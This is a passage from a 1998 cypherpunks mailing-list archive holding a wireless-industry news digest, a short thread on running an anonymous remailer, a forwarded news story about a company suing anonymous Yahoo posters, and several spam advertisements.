The newcomers to the web graphics market might call themselves the best,
but after a test drive we're sure you'll agree that the HVS tools give the
most excellent results on images for the Internet. With their new low
pricing, HVS products are a superb value for professionals and personal web
designers.

Pricing for our standalone products, HVS ColorGIF 2 and HVS JPEG 2, has
also been reduced, from $99 to $65. HVS Animator Pro is now available only
as part of HVS Toolkit Pro 2.

Visit our web site at http://www.digfrontiers.com to learn more about these
superb web imaging tools. Take a test drive by downloading our free,
full-featured, time-limited demos.

Also, please visit http://www.gifcruncher.com, a free web-based GIF
optimizer that we are hosting with SpinWave Software. GIFCruncher can
reduce the size and download times of existing GIFs by up to 90%, and basic
single image operations are free. With a paid GIFCruncher Batch membership,
you can enter the URL of your home page and watch GIFCruncher reduce your
GIFs automatically!

Sincerely,


Digital Frontiers
info@digfrontiers.com
847-328-0880 voice
847-869-2053 fax
http://www.digfrontiers.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 4 Sep 1998 12:00:07 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 4, 1998
Message-ID: <199809041848.NAA00707@revnet3.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713804.multipart/mixed"

--Boundary..3996.1071713804.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

One of your customers just made 
three really long distance calls.....simultaneously.
Have you deployed authentication?
CTIA's Wireless Security '98 - It's Just Smart Business.
Orlando, Florida  November 9 - 11, 1998 
http://www.wow-com.com/professional 
===========================================

 




--Boundary..3996.1071713804.multipart/mixed
Content-Type: application/octet-stream; name="bin00013.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00013.bin"
Content-Description: "_CTIA_Daily_News_19980904a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CjxDRU5URVI+CjxUQUJMRSBCT1JERVI9MCBDT0xT
PTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRwOi8vd3d3
Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNv
bS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09NLkNPTSIg
Tk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9BPjwvVEQ+
Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNv
bS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5kZXguY2Zt
Ij48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFnZXMvcHJv
ZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBBTFQ9IlRv
ZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJVFkgOTgi
IE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1PjwvQT48L0NF
TlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT4KJm5ic3A7CjxUQUJMRSBCT1JE
RVI9MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5
IE5ld3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDQsIDE5OTg8L0ZPTlQ+
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlRlYWNoZXJzIFJh
bmsgV2lyZWxlc3MKUGhvbmVzIEFoZWFkIG9mIENvbXB1dGVycyBhbmQgSW50
ZXJuZXQgZm9yIFVzZWZ1bG5lc3MgaW4gQ2xhc3Nyb29tczwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5OYXRpb25hbCBz
dXJ2ZXkgZGVtb25zdHJhdGVzIHZhbHVlIG9mCnBob25lcyBmb3Igc2FmZXR5
IGFuZCBjb21tdW5pY2F0aW9uIHdpdGggcGFyZW50cy48L0ZPTlQ+Jm5ic3A7
CjxCUj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxBIEhSRUY9Imh0
dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3
cy9ib2R5X25ld3MuY2ZtP05FV1NfSUQ9MzQwMCI+KFdPVy1DT00pPC9BPjwv
Rk9OVD4mbmJzcDs8L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5SZXAuIEJpbGx5IFRhdXppbiBTcGVha3MKT3V0IE9u
IEVuY3J5cHRpb24sIFRoZSBIaWdoLVRlY2ggSW5kdXN0cnkgYW5kIFRoZSBS
b2xlIG9mIEdvdmVybm1lbnQ8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+VS5TLiBSZXByZXNlbnRhdGl2ZSBCaWxseSBU
YXV6aW4gZGlzY3Vzc2VzCmhpcyB2aWV3cG9pbnRzIG9uIHRoZSBoaWdoLXRl
Y2ggaW5kdXN0cnksIGxlZ2lzbGF0aW9uIGFuZCB0aGUgcm9sZSBvZiB0aGUK
RkJJIGluIGVuY3J5cHRpb24gc29mdHdhcmUuJm5ic3A7IFRhdXppbiBiZWxp
ZXZlcyB0aGUgaGlnaC10ZWNoIGluZHVzdHJ5CmlzIGNhcGFibGUgb2YgcmVn
dWxhdGluZyB0aGVtc2VsdmVzLCBhbmQgdGhlIEZCSSBzaG91bGQgbm90IGhh
dmUgdGhlIGtleQp0byBlbmNyeXB0aW9uIGNvZGVzIGZvciB0aGUgc2FmZXR5
IG9mIGFsbCBvcmdhbml6YXRpb25zLjwvRk9OVD4mbmJzcDsgPEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48QSBIUkVGPSJodHRwOi8vd3d3LnpkbmV0
LmNvbS96ZG5uL3N0b3JpZXMvemRubl9zbWdyYXBoX2Rpc3BsYXkvMCwzNDQx
LDIxMzQ3NTQsMDAuaHRtbCI+KFpETkVUKTwvQT4mbmJzcDs8L0ZPTlQ+CjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEEgSFJFRj0iaHR0cDovL3d3
dy53aXJlZC5jb20vbmV3cy9uZXdzL3RlY2hub2xvZ3kvc3RvcnkvMTQ4MTku
aHRtbCI+KFdJUkVEKTwvQT48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Q1RJQSBGaWxlcyBQZXRpdGlv
biBpbgpTdXBwb3J0IG9mIFdlc3Rlcm4gV2lyZWxlc3MgaW4gS2Fuc2FzIFVu
aXZlcnNhbCBTZXJ2aWNlIEZ1bmQgQ2FzZTwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgQ2VsbHVsYXIgVGVsZWNv
bW11bmljYXRpb25zIEluZHVzdHJ5CkFzc29jaWF0aW9uIGhhcyBmaWxlZCBj
b21tZW50cyBiZWZvcmUgdGhlIEZlZGVyYWwgQ29tbXVuaWNhdGlvbnMgQ29t
bWlzc2lvbgpzdXBwb3J0aW5nIFdlc3Rlcm4gV2lyZWxlc3MncyByZXF1ZXN0
IGZvciBwcmVlbXB0aW9uIG9mIEthbnNhcyBVbml2ZXJzYWwKU2VydmljZSBG
dW5kIGltcGxlbWVudGF0aW9uLiZuYnNwOyBDVElBIGFyZ3VlcyB0aGF0IHRo
ZSBLYW5zYXMgcnVsZXMgZGlzY3JpbWluYXRlCmFnYWluc3QgbmV3IGVudHJh
bnRzIGluIHZpb2xhdGlvbiBvZiBmZWRlcmFsIGxhdy48L0ZPTlQ+Jm5ic3A7
IDxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEEgSFJFRj0iaHR0cDov
L3d3dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWwvcmVmZXJlbmNlL3BkZi93
dG53bGVzc3BldC5wZGYiPihXT1ctQ09NKTwvQT48L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RkNDIFdv
cmtpbmcgUGFwZXIgU3RhdGVzCk5ldyBSZWd1bGF0aW9ucyBBcmUgTmVlZGVk
IEluIFRoZSBOZXcgQWdlIG9mIFRlY2hub2xvZ3k8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+RkNDIFdvcmtpbmcgUGFw
ZXIgaGFzIHRoZSBhbnN3ZXIgdG8gd2h5CjIwLXllYXItb2xkIHJlZ3VsYXRp
b25zIG5vIGxvbmdlciBtYWtlIHNlbnNlIGluIG91ciBhZHZhbmNlZCBjb21t
dW5pY2F0aW9ucwphZ2UuJm5ic3A7IE5ldyByZWd1bGF0aW9ucyBhcmUgbmVl
ZGVkIHRoYXQgcmVsYXRlIHRvIHRoZSBuZXcgdGVjaG5vbG9naWVzLiZuYnNw
Owo8QSBIUkVGPSJodHRwOi8vd3d3Lm5ld3MuY29tL05ld3MvSXRlbS8wLDQs
MjYwNTUsMDAuaHRtbD9vd3YiPihORVdTKTwvQT4KPEEgSFJFRj0iaHR0cDov
L3d3dy53aXJlZC5jb20vbmV3cy9uZXdzL3BvbGl0aWNzL3N0b3J5LzE0ODMw
Lmh0bWwiPihXSVJFRCk8L0E+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkhpZ2gtVGVjaCBDaGFsbGVu
Z2VzCkFoZWFkIEZvciBUaGUgU3RhdGUgb2YgRmxvcmlkYTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5TdGF0ZSBlY29u
b21pYyBkZXZlbG9wbWVudCBvZmZpY2lhbHMgaGF2ZQpwdXQgZm9ydGggdGhl
IGVmZm9ydCB0byBhdHRyYWN0IHRlY2hub2xvZ3kgY29tcGFuaWVzIHRvIEZs
b3JpZGEuJm5ic3A7ClRoZXNlIGVmZm9ydHMgaW5jbHVkZSBtYWtpbmcgdGhl
bXNlbHZlcyBhdmFpbGFibGUgdG8gY29ycG9yYXRpb25zIHN1Y2gKYXMgTHVj
ZW50IFRlY2hub2xvZ2llcywgTW90b3JvbGEgYW5kIFNpZW1lbnMgVGVsZWNv
bS48L0ZPTlQ+IDxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEEgSFJF
Rj0iaHR0cDovL3d3dy5oZXJhbGQuY29tLyI+KEhFUkFMRCk8L0E+PC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPkJlbGwgQXRsYW50aWMgUmVzcG9uZHMKdG8gUGVubnN5bHZhbmlhIFBV
Q5JzIERlY2lzaW9uIFRvIENvbWJpbmUgQ29uc2lkZXJhdGlvbiBvZiBUZWxl
Y29tbXVuaWNhdGlvbnMKSXNzdWVzPC9GT05UPjwvRk9OVD48L0I+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlByZXNpZGVudCBvZiBCZWxsIEF0bGFu
dGljIC0gUGVubnN5bHZhbmlhCmlzc3VlcyBzdGF0ZW1lbnQgc3VwcG9ydGlu
ZyBjb25zb2xpZGF0aW9uLiA8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20u
Y29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3MvYm9keV9uZXdzLmNmbT9O
RVdTX0lEPTM0MDEiPihXT1ctQ09NKTwvQT48L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+R1NNIEFsbGlh
bmNlIFJlc3BvbnNlClN0YXRlbWVudCB0byBVLlMuIFNlbmF0ZSBSZXNvbHV0
aW9uIG9uIDNHPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPk5vcnRoIEFtZXJpY2FuIEdTTSBBbGxpYW5jZSBhcHBsYXVk
cyB0aGUKU2VuYXRlJ3MgcmVzb2x1dGlvbiBzdXBwb3J0aW5nIG11bHRpcGxl
IFRoaXJkIEdlbmVyYXRpb24gV2lyZWxlc3MgZGlnaXRhbApzdGFuZGFyZHMu
PC9GT05UPiA8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxBIEhSRUY9
Imh0dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwv
bmV3cy9ib2R5X25ld3MuY2ZtP05FV1NfSUQ9MzQwMiI+KFdPVy1DT00pPC9B
PjwvRk9OVD4mbmJzcDs8L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5HZXJtYW4gUGhvbmUgQ29tcGFuaWVzCkFwcGx5
IGZvciBMaWNlbnNlcyBUbyBTZWxsIFdpcmVsZXNzIFBob25lIFNlcnZpY2U8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
QXBwbGljYXRpb25zIGZvciB3aXJlbGVzcyBwaG9uZSBzZXJ2aWNlCmFyZSBi
ZWluZyBhY2NlcHRlZCBieSB0aGUgR2VybWFuIHRlbGVjb21tdW5pY2F0aW9u
cyByZWd1bGF0b3IuJm5ic3A7IDI1Ckdlcm1hbiBwaG9uZSBjb21wYW5pZXMg
aGF2ZSBhcHBsaWVkIGluIG9yZGVyIHRvIGNyZWF0ZSBhIG5ldyB3YXkgb2Yg
YnJpbmdpbmcKc2VydmljZSB0byBob21lcyBhbmQgYnVzaW5lc3NlcyBvdXRz
aWRlIG9mIHRoZSBHZXJtYW4gbW9ub3BvbHkgaGVsZCBieQpEZXV0c2NoZSBU
ZWxla29tIEFHLjwvRk9OVD4gPEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48QSBIUkVGPSJodHRwOi8vd3d3LnRvdGFsdGVsZS5jb20vY2dpLWJpbi9u
ZXdzLmNnaS8xODkzNC93b3JsZG1vcmUuaHRtbCI+KFRPVEFMVEVMRSk8L0E+
PC9GT05UPiZuYnNwOzwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3
cyBhYm91dAp0aGUgd2lyZWxlc3MgaW5kdXN0cnktLWluY2x1ZGluZyBwZXJp
b2RpYyBuZXdzIHVwZGF0ZXMgdGhyb3VnaG91dCB0aGUgZGF5LS12aXNpdAo8
QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tIj5odHRwOi8vd3d3Lndv
dy1jb20uY29tLjwvQT48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJ
QSBEYWlseSBOZXdzIGZyb20gV09XLUNPTQppcyB0cmFuc21pdHRlZCB3ZWVr
ZGF5cywgZXhjZXB0IGZvciBob2xpZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdv
cmxkIFdpZGUKV2ViIGF0IDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5j
b20vcHJvZmVzc2lvbmFsIj5odHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zl
c3Npb25hbDwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5JZiB5
b3UgYXJlIG5vdCBpbnRlcmVzdGVkCmluIHJlY2VpdmluZyB0aGUgQ1RJQSBE
YWlseSBOZXdzIGZyb20gV09XLUNPTSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdl
IHRvCjxBIEhSRUY9Im1haWx0bzp1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVt
Mi51bml0eW1haWwuY29tIj51bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51
bml0eW1haWwuY29tPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoK
PFA+PEI+KioqPEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPS0xPiBUaGUgdGVybSAidW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIu
dW5pdHltYWlsLmNvbSIKbXVzdCBiZSBsaXN0ZWQgaW4gdGhlIFRPIHNlY3Rp
b24gb2YgdGhlIGVtYWlsLjwvRk9OVD48L0ZPTlQ+ICoqKjwvQj4mbmJzcDsK
CjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0t
MT5QbGVhc2UgTm90ZTogU29tZSBvZiB0aGUKbGlua3MgaW4gdG9kYXkncyBu
ZXdzIGFyZSB0aW1lIHNlbnNpdGl2ZS4mbmJzcDsgVGhvc2UgbGlua3MgbWF5
IG5vdCBiZQphdmFpbGFibGUgYXMgbmV3cyBjaGFuZ2VzIHRocm91Z2hvdXQg
dGhlIGRheS4mbmJzcDsgQWxzbywgc29tZSBuZXdzIHNvdXJjZXMKbWF5IGJl
IHN1YnNjcmlwdGlvbi1iYXNlZCBvciByZXF1aXJlIHJlZ2lzdHJhdGlvbi48
L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDs8L0NFTlRFUj4KPC9CT0RZPgo8L0hU
TUw+Cg==
--Boundary..3996.1071713804.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <Laurent.Demailly@Sun.COM>
Date: Fri, 4 Sep 1998 16:13:01 -0700 (PDT)
To: martin..@iname.com
Subject: setting up a remailer service
In-Reply-To: <199809030754.DAA01354@web05.iname.net>
Message-ID: <13808.27579.860140.831829@pomerol>
MIME-Version: 1.0
Content-Type: text/plain


martin..@iname.com writes:
 > I'd like to set up a free remailer service for the internet community.
 > I have a static IP,
 > good disk space
   ***************
 > and my machine is located in Norway. 
[...]

Not to be over suspicious but why would you need
a lot of disk space for a remailer ? do you plan
on logging and recording all the messages ;-) ?

-- dl, speaking only for himself




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Fri, 4 Sep 1998 18:56:23 -0700 (PDT)
To: Laurent Demailly <Laurent.Demailly@Sun.COM>
Subject: Re: setting up a remailer service
In-Reply-To: <13808.27579.860140.831829@pomerol>
Message-ID: <Pine.LNX.3.96.980904214154.28228A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Sep 1998, Laurent Demailly wrote:
> martin..@iname.com writes:
>  > I'd like to set up a free remailer service for the internet community.
>  > I have a static IP,
>  > good disk space
>    ***************
>  > and my machine is located in Norway. 
> [...]
> 
> Not to be over suspicious but why would you need
> a lot of disk space for a remailer ? do you plan
> on logging and recording all the messages ;-) ?

He mentioned in the original message that he wanted to run a service like
anon.penet.fi .. 

penet set up an anonymous box, that is .. you can remail a letter through
penet and it would assign a unique anonymous addy for you, and then
replies and email to that anonymous addy would get forwarded to you.

This would require disk space. 

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Enlightenment is man's emergence from his self-incurred immaturity.
Immaturity is the inability to use one's own understanding without the
guidance of another. . .Sapere aude! Have the courage to use your own
understanding!" - Immanuel Kant "What is Enlightenment?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Sat, 5 Sep 1998 01:18:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (another) reason we need anon servers.
Message-ID: <3.0.3.32.19980905011845.006bb77c@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain


Itex Sues Over Yahoo! Postings

Friday, September 4, 1998; 12:13 p.m. EDT

PORTLAND, Ore. (AP) -- An investment firm is suing the people who posted
online messages on a Yahoo! bulletin board accusing managers of
incompetence, even though the firm has no idea whom to sue.

Itex Corp. listed 100 ``John Does'' in its lawsuit filed this week in
Multnomah County Circuit Court.

In May, somebody using the name ``Orangemuscat'' declared on the Yahoo!
online message board that Itex's ``current management is blind, stupid and
incompetent.''

The lawsuit charges the author of the message with defaming the company and
its president, undermining the confidence of Itex's investors, customers
and barter exchange members.

``Orangemuscat,'' ``Investor727,'' ``colojopa'' and other names are listed
as defendants ``presently unknown to plaintiffs but whose true identities
will be included in amendments hereto when those identities are discovered.''

Donovan Snyder, an Itex lawyer, said it was necessary to sue in order to
find the authors of the message, but he declined further comment.

Itex, a barter exchange brokerage, had engaged in a bitter takeover
struggle with a rival brokerage, and has faced questions from critics who
challenge the way it values its assets. The company previously has turned
to the courts to battle former employees and critics.

Yahoo! disclaims all responsibility for the messages that are posted on its
message boards.

``We have no way of knowing who some of the people are,'' said John Place,
Yahoo's general counsel.

Place said Yahoo's policy is to refuse to surrender any user information
unless a court orders it to do so. But even under a court order, he said
Yahoo! would have a hard time identifying users.

The case is one of many that are pushing courts to define privacy rights on
the Internet.

``I would not want to limit people's ability to post information online,''
said Lois Rosenbaum, a partner at the Portland law firm of Stoel Rives.
``But I would like to see some accountability for what they posted.''

Rosenbaum represented Beaverton-based Epitope in a 1993 case against a man
who posted critical remarks about the company on a public bulletin board on
the Prodigy online service. In that case, the comments turned out to be
from a stockbroker with an interest in driving down the price of Epitope's
shares.


-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
"To assert that the earth revolves around the sun is as erroneous as to 
claim that Jesus was not born of a virgin." 
		- Cardinal Bellarmine 1615, during the trial of Galileo 
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 5 Sep 1998 09:51:02 -0700 (PDT)
To: (STUFFED SATURDAY SEPTEMBER 5 1998)
Subject: Man wires his balls to a transformer - holy smoke!/Virgin sex on the web site was 'a scam'
Message-ID: <19980905071000.2552.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


ALSO IN THIS ISSUE:  PAGE 2 'SPREAD';  TASTY TORI;
ALLIGATOR  ANTICS;  THUMBNAIL HEAVEN;  SEXY STORY:
"TEAM PLAYER"; MULTIPLE MARRIAGES; STRAIGHT PRIDE;
LAYING CABLE;  MORE THUMBS;  VAN-GONADS;  MEET THE
BEAVER;  THE BEST OF EUREKA; SEXY SURPRISE THUMBS;
LANDING A  BATHING  BEAUTY;  MEGA THUMBNAIL  ORGY;
ORGASMIC PIC OF THE DAY; AND MUCH, MUCH MORE!

       ---->   http://stuffed.net/98/9/5/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/5/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cell@cyber-host.net
Date: Sat, 5 Sep 1998 08:59:33 -0700 (PDT)
To: <chongo@toad.com>
Subject: AD: Cellphone Batteries at Half Price
Message-ID: <199809051559.IAA03160@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This message is sent in compliance with the new e-mail bill: SECTION 301, 
Paragraph (a)(2)(C) of s. 1618

Sender : Cell Phone Battery Store, P.O.Box 16494, Encino, CA 91416
Phone  : 1-818-773-1975
E-mail : cell@cyber-host.net

To be removed from our mailing list, simply reply with "REMOVE" in the
subject.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When you need a Battery for your Cellphone - Save Big! - Get it Quick and 
Easy online at CELLPHONE BATTERY WAREHOUSE -- Top Quality Batteries - 
Lowest Prices Guaranteed, Giant Selection, Excellent Service.
